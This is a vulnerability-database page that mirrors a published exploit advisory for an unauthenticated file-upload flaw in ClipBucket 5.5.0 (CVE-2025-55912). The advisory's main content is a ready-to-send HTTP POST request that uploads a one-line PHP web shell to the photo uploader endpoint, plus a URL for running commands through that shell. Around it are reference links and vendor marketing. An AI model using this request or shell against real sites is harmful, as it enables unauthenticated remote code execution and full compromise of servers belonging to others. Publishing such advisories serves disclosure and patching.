Lucene search
K

📄 ClipBucket 5.5.0 Shell Upload

🗓️ 03 Nov 2025 00:00:00Reported by Mukundsinh SolankiType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 162 Views

ClipBucket up to version five point five point zero allows unauthenticated file upload and code execution.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Ntemplatesbyxit
7 May 202615:36
githubexploit
Circl
CVE-2025-55912
17 Sep 202521:02
circl
CNNVD
ClipBucket 权限许可和访问控制问题漏洞
18 Sep 202500:00
cnnvd
CVE
CVE-2025-55912
18 Sep 202500:00
cve
Cvelist
CVE-2025-55912
18 Sep 202500:00
cvelist
Exploit DB
ClipBucket 5.5.0 - Arbitrary File Upload
16 Sep 202500:00
exploitdb
EUVD
EUVD-2025-29853
3 Oct 202520:07
euvd
NVD
CVE-2025-55912
18 Sep 202516:15
nvd
OSV
CVE-2025-55912
18 Sep 202516:15
osv
Positive Technologies
PT-2025-38416
18 Sep 202500:00
ptsecurity
Rows per page
# Exploit Title: ClipBucket 5.5.0 - Arbitrary File Upload
    
    # Google Dork: N/A
    
    # Date: 2025-09-11
    
    # Exploit Author: Mukundsinh Solanki (r00td3str0y3r)
    
    # Vendor Homepage: https://clipbucket.com
    
    # Software Link: https://github.com/MacWarrior/clipbucket-v5
    
    # Version: <= 5.5.0
    
    # Tested on: Ubuntu 20.04 LTS, PHP 7.4
    
    # CVE: CVE-2025-55912
    
    ## Vulnerability Description:
    ClipBucket <= 5.5.0 suffers from an unauthenticated arbitrary file upload
    vulnerability in `upload/actions/photo_uploader.php`. Missing access
    controls and insufficient validation of uploaded files allow an attacker to
    upload a crafted PHP file and execute it remotely, leading to full remote
    code execution (RCE).
    
    ## PoC Request:
    
    POST /upload/actions/photo_uploader.php HTTP/1.1
    Host: victim.com
    Content-Type: multipart/form-data; boundary=----BOUND
    
    ------BOUND
    Content-Disposition: form-data; name="Filedata"; filename="shell.php"
    Content-Type: application/x-php
    
    <?php system($_GET['cmd']); ?>
    ------BOUND--
    
    
    The file is uploaded without authentication. The attacker can then access
    it:
    
    
    http://victim.com/files/photos/shell.php?cmd=id
    
    
    ## Impact:
    - Unauthenticated remote code execution (RCE)
    - Full compromise of target application and underlying server
    
    Regards,
    Mukundsinh Solanki
    +916355251151

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

03 Nov 2025 00:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.17.3
EPSS0.05131
SSVC
162